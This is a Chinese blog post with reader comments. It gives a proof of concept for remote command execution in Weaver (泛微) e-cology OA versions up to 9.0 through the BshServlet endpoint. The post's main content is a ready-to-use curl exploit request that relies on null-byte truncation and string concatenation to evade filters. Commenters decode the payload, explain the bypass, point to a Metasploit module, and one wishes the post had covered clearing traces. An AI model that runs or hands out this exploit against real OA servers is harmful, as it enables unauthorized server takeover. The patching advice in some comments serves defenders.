泛微OA系统多版本存在命令执行漏洞-POC

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试2015,7182字数 0阅读0分0秒阅读模式
AI智能摘要
你是否想过,一个办公系统竟会成为黑客入侵的突破口?泛微OA多版本被曝存在高危命令执行漏洞,攻击者只需构造特定请求,便可远程获取服务器权限,后果不堪设想。本文详细揭示漏洞成因、影响范围及复现过程,带你直击安全防线的致命缺口,每一位系统管理员和技术人员都不可错过。
— AI 生成的文章内容摘要
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统weaver e-cology 8存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行

0x03影响范围
泛微 e-cology<=9.0

0x04漏洞复现
访问 http://url/weaver/bsh.servlet.BshServleth 输入 payload 如下:
泛微OA系统多版本存在命令执行漏洞-POC

漏洞路径:/weaver/bsh.servlet.BshServlet exec("whoami") curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev al%00("ex"%2b"ec(/"whoami/")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

http://www.oniont.cn/index.php/archives/224.html

 
OnionT@KillBoy
  • it2021
  • it2021.com
  • 代码执行
  • 命令执行漏洞
  • 泛微OA漏洞
  • 漏洞复现
  • 远程代码执行
评论  20  访客  20
    • 泡泡小甜心
      泡泡小甜心 1

      这漏洞听着挺可怕,内网没打补丁的要赶紧排查。

      • 活力的瀑布
        活力的瀑布 0

        curl那段payload看着就晦涩,能不能贴个解码后的示例?

          • 龙傲天的弟弟
            龙傲天的弟弟 1

            @ 活力的瀑布 payload解码后大概是 bsh.script=eval(“exec(“whoami”)”) 这样,%2b是加号。

          • Leo光
            Leo光 0

            感觉厂商更新太慢了,老版本还在用的公司风险好大。

            • 樱花小馆
              樱花小馆 0

              我之前运维时也碰过类似BshServlet注入,修起来挺麻烦的,折腾了整整一天。

              • 荔枝乌龙
                荔枝乌龙 0

                这个能拿到root权限吗?文中没说清楚,想知道实际危害范围。

                • Dreamrift
                  Dreamrift 1

                  有没人实测过Metasploit模块或者现成POC?想复现一下。

                    • 风回山
                      风回山 1

                      @ Dreamrift Metasploit里好像有现成的模块,exploit/multi/http/weaver_bsh_rce,你可以找找看。

                    • BeastlyGuffaw
                      BeastlyGuffaw 1

                      漏洞利用链讲得还行,但细节上没交代清理痕迹的方法,实战里很关键。

                      • 自然之子
                        自然之子 0

                        又是老漏洞被翻出来,泛微这类系统要是暴露在公网就危险了,建议内网隔离处理。

                        • 森林女巫
                          森林女巫 0

                          谁能解释下payload里的%00和拼接为什么能绕过校验?🤔

                            • 穷奇破晓
                              穷奇破晓 0

                              @ 森林女巫 %00是空字节,脚本引擎解析到这就可能截断,拼接字符串是为了绕过某些关键字的检测。

                            • VelvetShadow
                              VelvetShadow 1

                              脚本小子又该出动了。

                                • TheInvisibleGuest
                                  TheInvisibleGuest 1

                                  @ VelvetShadow 这话说的,懂行啊。

                                • 鸭子游游
                                  鸭子游游 0

                                  短评:注意更新补丁,别放在公网。

                                  • 星辉守护
                                    星辉守护 0

                                    之前公司内网扫出来过这个,应急响应搞得人仰马翻,还好没被利用。

                                    • 酿酒杨
                                      酿酒杨 1

                                      这个%00是空字符截断吧?

                                        • 月下流光
                                          月下流光 1

                                          @ 酿酒杨 对,就是空字符

                                        • 沙洲旅人
                                          沙洲旅人 0

                                          这种老系统,特别是政务单位,好多都还在用,打补丁流程长得很。

                                          • 巅峰咨询
                                            巅峰咨询 0

                                            危害范围肯定不小,能拿到Web服务进程权限,要是权限配置有问题,提权也不是没可能。

                                          匿名

                                          发表评论

                                          匿名网友

                                          拖动滑块以完成验证